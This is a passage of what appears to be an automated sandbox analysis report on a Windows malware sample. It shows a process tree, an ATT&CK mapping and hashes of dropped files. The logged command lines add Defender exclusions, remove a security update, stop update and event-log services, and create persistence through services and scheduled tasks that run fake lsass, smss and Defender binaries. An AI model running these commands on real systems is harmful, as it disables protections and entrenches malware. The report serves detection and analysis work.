        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hojPlGEzbD.bat"
        6⤵
        
        PID:2036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2288
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2384
        
        C:\Program Files\Windows Portable Devices\smss.exe
        
        "C:\Program Files\Windows Portable Devices\smss.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:872
- C:\Users\Admin\AppData\Local\Temp\build.exe
  "C:\Users\Admin\AppData\Local\Temp\build.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2776
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3008
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Drops file in Windows directory
      PID:1820
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:560
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:576
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:572
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:2404
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2376
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2732
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "ZNALQAQP"
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "ZNALQAQP" binpath= "C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1272
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:1592
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "ZNALQAQP"
    3⤵
    - Launches sc.exe
    PID:2868

C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe
C:\ProgramData\xkfaujlbhedp\bjqgtalbkeyq.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2592
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1548
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:848
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:472
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2228
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1040
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2412
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:656
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:3056
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1744
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Start Menu\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Start Menu\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCore" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WIndowsDefendirCoreW" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE7B0.tmp

Filesize
1KB

MD5
dca20ce3f426d0bff361ba8102efc1ee

SHA1
45221cafe3f56bad6dcc7e55393bef6479cc7865

SHA256
6b30ba2f40deda17781bce0e83fd7a7db206eeb9ad64acce4affb8116b3eeb7a

SHA512
c4a2076df48c8c500b8d5b212e37c5b728ab1bd3aa8f3f1c54173c508f575905febbd279d3a97ee2240d1f6ba1614caae0aaabf1323a26d58d1def9b4b31b072

Download Submit
C:\Users\Admin\AppData\Local\Temp\hojPlGEzbD.bat

Filesize
178B

MD5
b13cf7bc94f678a0e6b9bff4b4e87363

SHA1
bc52aebc0e249da1dc04e50632833df0804108ce

SHA256
3b071de6e3120fb10368020eb0ca7456fce6cad42935f107899afd34b01b1f17

SHA512
a115350d987e809e51fcd2c1a18c960dd4a1a9b360a672fac9df8da25b9fe974b7de85de50c9bdacd946304663609b701200f6845d65a6867e873aa1354448fe

Download Submit
C:\Users\Admin\AppData\Roaming\DirecctX\emdqIIr51ANxc8YnT8oM67sWOC7lQfL50WxcLdlgUyJcLXMn.bat

Filesize
83B

MD5
1352bcf0074f83167937d0b792c87422

SHA1
1fccfc8e6e58c157a108b419b059bf56a376218e

SHA256
a8e94b3d8f08f7363d67b3d878a13a3f6bcedb7bf2c30bd12013a1274cdd5eb8

SHA512
7e7e7685ded282f260399f4914d30d3f66fc16718e37ecfe7120211c416c1ec61c0a8f9c53219714bc243e10417955eca1d808fb650b749cdd30deb2b95c12a7

Download Submit
C:\Users\Admin\AppData\Roaming\DirecctX\xxNjaoakdqlq77rW9ny37esSaaIYvVrl9XvRF2EmRo3BjUX9SZCU8jwS.vbe

Filesize
242B

MD5
1b498932bffb477f2d766265c95027c8

SHA1
e5e6782b8a085660a0fb18d0c22dd8badd143ca7

SHA256
7daf3de82393f499ae2c49ad5bf4e90ffa6202358719a2fb5d630483fa30faec

SHA512
319022a1ebfbd5343f309bbbc340ae8c1541074202f28406052426e72483a498417f92bd88c993fd13f48bc6ea9a8d8c16f93ac68e6c2ad33a24fec0b656a942

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2154f2a83e38698b88602d71e2247a61

SHA1
a56efd802bd2653b25cb95d93cd72def4476ccf2

SHA256
e88fd17b2708db76655f2ff77c71d56c3ede66dc5a7132655d6aceaa093d7ce5

SHA512
60912b5b0c1c9e1a6d685ed2d3f3f628773918e329b490a290c992ebfeda20bb49041e4eb66c68a9d6086417df1e96c72de681bbaa5806e28153aa1ce77cd53b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
14689bb904798b9f1c16137b913cf604

SHA1
97482899851cf2c81b9a97fdcb0107925acae6bf

SHA256
719b848fbe76a083ceda73fb4d8ae18f7dd71e114621c1f1850e180692897abc

SHA512
d28b03743f15c25955a2ea41439cc590e0ef3699787f99998ac2af7cd1d90fefdab498e6cccc29935ef23f7c84ee486b67ef290ae4f78b92ce327571ce3315b2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hfuacgu3\hfuacgu3.0.cs

Filesize
371B

MD5
1839b8469ad3ed2edcf0927fed0da42d

SHA1
a779b3152fdde56e0252c354ca5e25ac633801a5

SHA256
092941b1a89e4cac2e93c38e7d01a15ed2bf5743ee4e9c4399c263eee04cc96e

SHA512
c537d777a9b1b51882f0e5d14ccc23bd08eca12317a1a62d6e651e0d9b2a8850147150be5661c934feec3c1d99110554f84456e877d2b6f592a3f89d1a01d9f2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hfuacgu3\hfuacgu3.cmdline

Filesize
235B

MD5
27480236ea7313059fcd689b373fadcf

SHA1
5a0a2e41a353b2080c92a4ef0e566a4c3cc288b3

SHA256
b8a56b9e7ed9d38b426b51fe55d7e226a4a041ff2d66a24ef85edb22779fb5d4

SHA512
d97db316047eeddb6a17fcd6e3eb601069641308e1f07887c89e3c2196f7ab3240210a6342c55cecbd5d62f320836bbf4d35601892b16199bd543e67da97b133

Download Submit
\??\c:\Windows\System32\CSCFDB28C07E874A87A4CF89D1142104.TMP

Filesize
1KB

MD5
028d4cd290ab6fe13d6fecce144a32cc

SHA1
e1d9531cb2e6bc9cab285b1f19e5d627257a3394

SHA256
3f42f68eb3df49cf836fbb0019b8206af735e22f3d528e7b122fa9b2541fdde3

SHA512
2f99d37a56444831298f8efaef425e5dadec938ac459bfc0cdaf3708ef8662f12bd8d687a58fc1dd6bbdac6c806214b65a21489a24d3160c1e8575968e3caa6e

Download Submit
\Users\Admin\AppData\Local\Temp\New.exe

Filesize
2.2MB

MD5
f949e6359bde9144353763e9b2e2142f

SHA1
8a12f6962a7ba1e7cb14eb4bdd92c4d192126b0f

SHA256
224c639c421a65b7d21cc3783de7b337927065bae7c14de84cb25dcea2b79db8

SHA512
fad2e708d8b03f7f32e72bdbf7780c5ca4f39f19f17cdc6571a12bce4977fd5a4e718ec5f5961e444bf159ff5c39e44a5300e1ff1c15ad385348061f7c7cdb05

Download Submit
\Users\Admin\AppData\Local\Temp\build.exe

Filesize
5.0MB

MD5
18d911bff318971dfcbc17779653d85b

SHA1
ce8f083dbb1bbf54f2e8f5cedbae08a39b840ced

SHA256
a762eb90202786607f19417fc0d199b0bf5de141a7f150eb607277bc8fe25d32

SHA512
49785c81667c748c6f4e062f239df9edef063ec89cde0bac7ba266ef96456d0ec480f990dc6e9fe2f590dc7250fc1465e7147cc469292b2cbb5576dee6214202

Download Submit
\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe

Filesize
1.9MB

MD5
254c53120741d9866651de36cd0be8da

SHA1
01025412a8dbf5d4b5a4f07a38158a6a5f0fe1b1

SHA256
f17e8166f08cfc46e520826cc833c6c6fed0557677d59078f7368900f8908626

SHA512
34ebe9833f0adff42fa96e2240165e489984c4be5555a1a030ea725b22fa6c42d3ff91dbf7703270b9981c4ca0663e97a205304bfa3d5b16d76f5911b94dd85b

Download Submit
memory/872-138-0x0000000001380000-0x000000000156A000-memory.dmp

Filesize
1.9MB

Download
memory/1124-49-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-56-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-47-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-48-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-51-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-58-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-57-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-60-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-55-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-54-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-52-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-50-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-53-0x00000000000B0000-0x00000000000D0000-memory.dmp

Filesize
128KB

Download
memory/1124-46-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1124-59-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1284-111-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/1744-40-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1744-41-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1744-38-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1744-37-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1744-44-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1744-39-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1892-14-0x0000000000400000-0x0000000000B42000-memory.dmp

Filesize
7.3MB

Download
memory/2500-28-0x000000001B460000-0x000000001B742000-memory.dmp

Filesize
2.9MB

Download
memory/2500-29-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2980-35-0x0000000019E40000-0x000000001A122000-memory.dmp

Filesize
2.9MB

Download
memory/2980-36-0x0000000000850000-0x0000000000858000-memory.dmp

Filesize
32KB

Download
memory/3024-76-0x0000000000410000-0x000000000041C000-memory.dmp

Filesize
48KB

Download
memory/3024-74-0x00000000003E0000-0x00000000003F2000-memory.dmp

Filesize
72KB

Download
memory/3024-72-0x00000000001C0000-0x00000000001D8000-memory.dmp

Filesize
96KB

Download
memory/3024-70-0x00000000001A0000-0x00000000001BC000-memory.dmp

Filesize
112KB

Download
memory/3024-68-0x0000000000190000-0x000000000019E000-memory.dmp

Filesize
56KB

Download
memory/3024-66-0x0000000000850000-0x0000000000A3A000-memory.dmp

Filesize
1.9MB

Download